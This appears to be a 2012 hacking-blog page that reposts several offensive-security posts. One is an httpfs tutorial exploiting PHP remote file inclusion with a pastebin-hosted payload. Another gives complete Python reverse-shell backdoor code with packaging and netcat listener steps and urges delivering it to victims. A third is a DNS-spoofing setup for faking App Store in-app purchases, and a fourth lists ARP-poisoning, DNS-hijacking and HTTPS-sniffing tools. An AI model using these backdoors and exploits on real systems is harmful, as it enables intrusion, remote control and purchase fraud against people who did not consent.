Aug 9, 2012

Penetration testing with httpfs: RFI


As every system administrator knows, mounting remote filesystem with protocols like sshfs or smbfs saves time and simplify interactions with remote machines. This leisure is usually not available when having limited remote access, like managing a web shell or during a web application penetration testing.

If you are familiar with those situations httpfs can help you mounting locally a remote filesystem, relying on a script, like a PHP file, installed on target webserver. This FUSE filesystem written by Andrea Cardaci and me is your next indispensable tool in your toolkit.

Basic usage
Just generate server side script, in this case PHP, upload it to target machine and mount remote location locally. Let’s see single steps:

1. Download httpfs archive or clone source code using github.
2. Compile and install it as written in README file.
3. Generate PHP script:
$ httpfs generate php > httpfs.php
 

4. Upload generated script to an accessible location inside the document root of target web server. In next paragraphs we will see some penetration testing techniques to run http PHP code exploiting file inclusion vulnerabilities.
 

5. Mount remote location locally:
$ httpfs mount http://target.com/httpfs.php /tmp/httpfs/

*** If you don’t have enough privileges to access to system root ‘/’, append as last parameter a remote folder to mount as basedir:
$ httpfs mount http://target.com/httpfs.php /tmp/httpfs/ /home/john
 

6. Browse your pretty awesome new mountpoint
$ cd /tmp/mounted
$ ls
bin cdrom etc initrd.img lib lost+found mnt proc run selinux sys usr vmlinuz
boot dev home initrd.img.old lib64 media opt root sbin srv tmp var vmlinuz.old


Exploiting file inclusion

Remote file inclusion is a common vulnerability that force to execute malicious PHP code to a vulnerable PHP web application. A tipical exploitable PHP script contains:

<?php
include($_GET['page']);
?>
Let’s exploit RFI to execute httpfs server side PHP code to achieve remote filesystem mounting.

1. Verify RFI vulnerability opening a web accessible resource from vulnerable script

$ curl http://target.com/fi.php?page="http://www.google.com"
 

2. By default PHP option “allow_url_fopen” is off to disable HTTP and FTP URL opening: in those cases try LFI attack as described at bottom.

3. Generate httpfs server side script as written in paragraph before.
4. Upload generated PHP script in a HTTP reachable site, as http://pastebin.com or something faster.
5. Run httpfs using as URL the location to load httpfs generated script:
$ mkdir /tmp/mounted
$ mount http://target.com/fi.php?page="http://pastebin.com/raw.php?i=XFYwGCK0" /tmp/mounted
 

6. Browse remote filesystem through local mount point.
$ cd /tmp/mounted
$ ls
bin cdrom etc initrd.img lib lost+found mnt proc run selinux sys usr vmlinuz
boot dev home initrd.img.old lib64 media opt root sbin srv tmp var vmlinuz.old
 

7. When an application is prone to file inclusion vulnerability but it doesn’t allow to open HTTP or FTP remote URLs, is anyway possible to inject our malicious code with techniques like /proc/self/environ or log poisoning.

httpfs will be included soon in Weevely as an automatic installation module, meanwhile enjoy this complete stand alone version.


Source: http://disse.cting.org/2012/07/27/penetration-testing-with-httfs-rfi/


If you like my blog, Please Donate Me

Web Shell Detector - To find and identify php shells

If you want to see all options, please go to the Source.

Web Shell Detector is a php script that helps you find and identify php/cgi(perl)/asp/aspx shells. Web Shell Detector has a “web shells” signature database that helps to identify “web shell” up to 99%. By using the latest javascript and css technologies, web shell detector has a light weight and friendly interface.

Detection: Number of known shells: 290

Requirements: PHP 5.x, OpenSSL

Usage: To activate Web Shell Detector:
1) Upload shelldetect.php and shelldetect.db to your root directory
2) Open shelldetect.php file in your browser Example: http://www.website.com/shelldetect.php
3) Inspect all strange files, if some of files look suspicious, send them to http://www.websecure.co.il team. After submitting your file, it will be inspected and if there are any threats, it will be inserted into a “web shell detector” web shells signature database.
4) If any web shells found and identified use your ftp/ssh client to remove it from your web server (IMPORTANT: please be carefull because some of shells may be integrated into system files!).
 





If you like my blog, Please Donate Me

Aug 8, 2012

Create Custom Backdoor With Python

1. Go to pyInstaller folder in your python folder

2. Copy this source code to python path.

#!/usr/bin/python

import subprocess,socket

host="your hacker ip"
port="your hacker port"

connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

connection.connect((host,port))
connection.send("You're in shell")

while 1:
    command = connection.recv(1024)
    if command == "quit": break
    
    proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)

   stdoutput = proc.stdout.read() + proc.stderr.read()

   connection.send(stdoutput)

connection.send("Bye bye")
connection.close()

3. Make the execute file
- python Configure.py
- python Makespec.py --onefile --noconsole shell.py
- python Build.py shell\shell.spec

4. Use netcat for wait the connection
- nc -l -p 443

5. Find the way to send shell executable from shell/

6. Have fun.

If you like my blog, Please Donate Me

Aug 7, 2012

iAPCracker - AppStore in-app purchasing algorithms

if you want to download app., please go to the Source.

in-app-proxy

This code allows you to emulate AppStore in-app purchasing algorithms.

Setup environment

You need UNIX, DNSMasq running with this configuration:  
server=/ax.init.itunes.apple.com/8.8.8.8 server=/itunes.apple.com/8.8.8.8 server=/ets.gameloft.com/8.8.8.8 server=/vgold.gameloft.com/8.8.8.8 server=/itunes.com/8.8.8.8 address=/.itunes.apple.com/91.224.160.136 address=/edgesuite.net/91.224.160.136 address=/api.textnow.me/127.0.0.1 address=/warspark.com/127.0.0.1 address=/gameloft.com/91.224.160.136 address=/receipts.jamiesrecipes.zolmo.com/127.0.0.1 address=/popcap.com/127.0.0.1 address=/digitalchocolate.com/127.0.0.1 address=/beeblex.com/127.0.0.1 address=/highnoon.happylatte.com/127.0.0.1 address=/dc.full-fat.com/91.224.160.136 address=/mobile.ext.terrhq.ru/91.224.160.136 address=/api.tapsonic.co.kr/127.0.0.1 address=/bubble.teamlava.com/127.0.0.1 address=/csrrun.naturalmotion.com/127.0.0.1 address=/testflightapp.com/127.0.0.1  
Also, you need nginx(apache) with php as module or cgi with these extensions: php-curl, pecl_http, php-xml
Note, pecl_http need to be built from sources, so install php-pear, php-dev and gcc.
Next, virtualhost with certificate and key itcert.pem, itcert.key (or generate yours) listens on *.itunes.apple.com on 443, virtualhost listens on *.itunes.apple.com on 80, pucert.cer - purchase receipt certificate with keylength = 1024, virtualhost listens on * on 443 for devs server emulation, virtualhost listens on * on 80 for devs server emulation,
rewrites all on iapcracker.php on *.itunes.apple.com, rewrites all to index.php on *.
Here is example for nginx:
if (!-e $request_filename) { rewrite ^/(.*)$ /iapcracker.php?URL=$1 last; break; } 

Source: https://github.com/ZonD80/in-app-proxy


If you like my blog, Please Donate Me

Portspoof - service signature obfuscator


If you want to download it, please go to the Source.



The portspoof program is designed to enhance OS security through emulation of legitimate service signatures on otherwise closed ports. It is meant to be a lightweight, fast, portable and secure addition to the any firewall system or security infrastructure.
The general goal of the program is to make the port scanning software (Nmap/Unicornscan/etc) process slow  and output very difficult to interpret,  thus making the attack reconnaissance phase a challenging and bothersome task.



Source: http://portspoof.duszynski.eu/

If you like my blog, Please Donate Me

Windows Hacking Toolset

APE ARP Poisoning Engine is a tool to poison the ARP cache of computers that are connected to the same LAN segment.
ARPGun ARPGun is a tool to poison the ARP cache of a target computer that is connected to the same LAN segment. You define the network interface, the target system’s IP address and ARPGun sends the poisoned ARP packets to it to cut its way to the Internet.
DNSHijack DNSHijack is a simple and straightforward tool to send faked DNS replies back to client system. If DNSHijack is answering the request faster than the DNS server the requesting client will keep the spoofed IP address in its DNS cache.
HTTPReverseProxy HTTPReverseProxy is a simple and strightforward HTTP reverse proxy server written in C#. When it is started it listens on the regular HTTP port, waits for incoming requests and forwards these to the server that is defined in the HTTP request headers Host directive. But instead of just forwarding requests it is also possible to modify the request itself or the responses sent back by the real web server. This is quite handy if you want to sniff data (like user names or passwords) that is protected by HTTPS.
HTTPSReverseProxy HTTPSReverseProxy is a HTTPS reverse proxy server written in C#. When it is started it listens on the regular HTTPS port (443), waits for incoming requests and forwards these to the server that is defined in the HTTP request headers Host directive. But instead of just forwarding requests it is also possible to modify the request itself or the responses sent back by the real web server.
IPAccounting IPAccounting is a tool to analyze and monitor incoming/outgoing IP traffic.
TCPForward TCPForward is a tool that, as its name already says, allows to forward TCP connections on a specific port.
TCPGun (Under development) TCPGun is a tool that sniffs and manipulates TCP connections. The user can take over a session and inject data or reset the connections according the set BPF string.


Source: http://www.megapanzer.com/2012/08/06/windows-hacking-toolset/

If you like my blog, Please Donate Me
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |